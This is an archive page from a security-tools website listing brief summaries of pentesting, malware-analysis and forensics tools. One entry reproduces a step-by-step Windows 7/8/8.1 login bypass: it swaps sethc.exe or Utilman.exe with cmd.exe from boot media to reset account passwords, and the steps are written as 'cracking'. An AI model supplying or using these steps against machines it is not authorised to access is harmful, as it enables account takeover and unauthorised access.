Security List Network™
Follow Us on FacebookFollow Us on Google+Follow Us on TwitterFollow Us on Pinterest
Menu
  • Home
  • About Us
  • Security Archives
  • Partners
Menu
  • Automation
  • Browser
  • Brute Force
  • Code Scripting
  • Cryptography
  • Encryption
  • Exploits
  • Framework
  • Linux Security Distros
  • Mobile Applications Tools
    • Android Tools
    • iPhone Tools
  • Networking
    • Bluetooth
    • Monitoring/System Administrator
    • Network Mapping/Scanner
    • Packet Sniffer/Sniffing
    • Internet Security
    • Spoofing/Spoofer
    • Wireless/wifi
  • Penetration Test
    • BenchMark
    • Cross Site Scripting(XSS)
    • Fuzzer/Fuzzing
    • Sql Injection
    • Stress Testing
  • Security Tools
    • Anti Malware/Virus – Malware Analysis
    • Firewall
    • Intrussion Detection and Prevention System(IDS/IPS)
    • Registry Analysis

SITEMAP

Archives

Browse: Home   /   Articles
SpiderSploit Framework Is a open source and free project for penetration testing.

SpiderSploit Framework Is a open source and free project for penetration testing.

February 10, 2018
ahm3ds
Articles, Framework, Penetration Test

SpiderSploit Framework Is a open source and free project for penetration testing. The feature of this tool is simple access to Exploits and Tools For…

Read Article →
AVCLASS - A Tool for Massive Malware Labeling.

AVCLASS – A Tool for Massive Malware Labeling.

July 14, 2016
w0rm32
Anti Malware/Virus - Malware Analysis, Articles, Security Tools

Labeling a malicious executable as a variant of a known family is important for security applications such as triage, lineage, and for building reference datasets…

Read Article →
Infestor - A cryptoanalysis on the malware Petya.

Infestor – A cryptoanalysis on the malware Petya.

May 11, 2016
Parmin Tukidi
Anti Malware/Virus - Malware Analysis, Articles, Code Scripting, Cryptography, Encryption

Petya is a relatively new crypt-ransomware that has been spreading in recent months (March – April 2016). When the user executes the PETYA .exe, the…

Read Article →
mac4n6 : Collection of forensics artifacs location for Mac OS X and iOS.

mac4n6 : Collection of forensics artifacs location for Mac OS X and iOS.

August 27, 2015
ahm3ds
Articles, Digital Forensics, iPhone Tools, Mobile Applications Tools, Security Tools

This is a collection for OS X and iOS artifacts location, trying to collect more information for each artifact, not just a path! From Mac4n6…

Read Article →
Blackbone is a Windows memory hacking library.

Blackbone is a Windows memory hacking library.

June 20, 2015
K-159
Articles

Blackbone is a Windows memory hacking library. Features : + x86 and x64 support + Process interaction — Manage PEB32/PEB64 — Manage process through WOW64…

Read Article →
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA.

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA.

January 12, 2015
Terry
Articles, Digital Forensics, Encryption, Exploits, Networking

Update 12-01.2015:  for Caveats section [OS X > 10.7.2] [6] and [Windows > 8.1] [7] Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The…

Read Article →
Microsoft Windows 7 / 8 / 8.1 Manual Auth Bypass.

Microsoft Windows 7 / 8 / 8.1 Manual Auth Bypass.

November 22, 2014
skygear
Articles, Code Scripting

Microsoft Windows 7 / 8 / 8.1 Manual Auth Bypass.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
0    ▄██████▄     ▄█    █▄     ▄██████▄     ▄████████     ███     ▄██   ▄                    0
1   ███    ███   ███    ███   ███    ███   ███    ███ ▀█████████▄ ███   ██▄                  1
0   ███    █▀    ███    ███   ███    ███   ███    █▀     ▀███▀▀██ ███▄▄▄███                  0
1  ▄███         ▄███▄▄▄▄███▄▄ ███    ███   ███            ███   ▀ ▀▀▀▀▀▀███                  1
0 ▀▀███ ████▄  ▀▀███▀▀▀▀███▀  ███    ███ ▀███████████     ███     ▄██   ███                  0
1   ███    ███   ███    ███   ███    ███          ███     ███     ███   ███                  1
0   ███    ███   ███    ███   ███    ███    ▄█    ███     ███     ███   ███                  0
1   ████████▀    ███    █▀     ▀██████▀   ▄████████▀     ▄████▀    ▀█████▀                   1
0                               im Gh0sty member Of 1337Day Algeria                          0
1--------------------------------------------------------------------------------------------0
0 Title           :  Microsoft Windows 7  / 8 / 8.1 Manual Auth Bypass                       1
1 Discovrer       :  Ghosty (0x9h027)                                                        0
0 Email           :  x31337666[at]gmail[dot]com                                              1
1 Facebook        :  https://facebook.com/0x9h027  (Subscribe Or PM me Only)                 0
0 Home            :  Algeria 16023 ( Alger - Hydra )                                         1
1 Category        :  Proof Of Concept                                                        0
0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
// Follow Steps Written Below 3:)
 
0x01 ~ Cracking Windows 7 Login
________________________________
     ~ 1/ Make a Bootable ( DVD or USB Device ) Any Live OS like (MiniLinux - MiniXP - Ubunto ) And boot From It
     ~ 2/ Go To "C:\Windows\System32\" and backup These Files cmd.exe , sethc.exe
     ~ 3/ Now Delete sethc.exe
~ 4/ Now Rename cmd.exe to sethc.exe
~ 5/ Reboot To Your Windows In The Login Panel
~ 6/ CLICK in "Ease Of Access" BUTTON And Select[ High-Contrast //  On-Screen-Keyboard // Sticky Keys] Then Ok You Will Get COMMAND :)
~ 7/ In CMD typeIn "mmc"
~ 8/ Congratulation Now In mmc You Can Change Your User Password :p
 
0x02 ~ Cracking Windows 8 Login
_______________________________
     ~ 1/ Make a Bootable ( DVD or USB Device ) Of Windows 8 Then Boot from it
~ 2/ In Setup Screen CLICK REPIAR COMPUTER Then Select TROUBLESHOOT >> ADVANCED OPTIONS >> COMMAND PROMPT
~ 3/ IN PROMPT EXECUTE : cd c:\Windows\System32\
                          ren Utilman.exe Utilman2.exe
  ren cmd.exe Utilman.exe
~ 4/ In Your Login Panel Click On "Ease Of Access" You Will Get COMMAND PROMPT 3:)
    ~ 5/ Congratulation You Can Execute : net user [USERNAME] and change your password :p
ping~########################################################################################\
inject0rTEAM-ExploitiD-ExploitDB-an0nghost-an0nsec-an0nDZ-DZMAFIA-TEAM152                    #
Caddy-Tr0ooN-KedAnZ-KingOfPirates-backoverDZ-cc0de-foundZ-kha&m!x-El!teTr0jan                #
#############################################################################################/
#EOF

Source : http://pastebin.com/eHQxCT2z

Read Article →
Nogotofail released : is a network security testing tool designed to help developers and security researchers.

Nogotofail released : is a network security testing tool designed to help developers and security researchers.

November 7, 2014
skygear
Android Tools, Articles, Networking, Penetration Test

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on…

Read Article →
1 2 Next →

Copyright © 2022

Powered by Worldwide CyberSecurity Team.

  • Digital Forensics
  • Networking
  • Penetration Test
  • Security Tools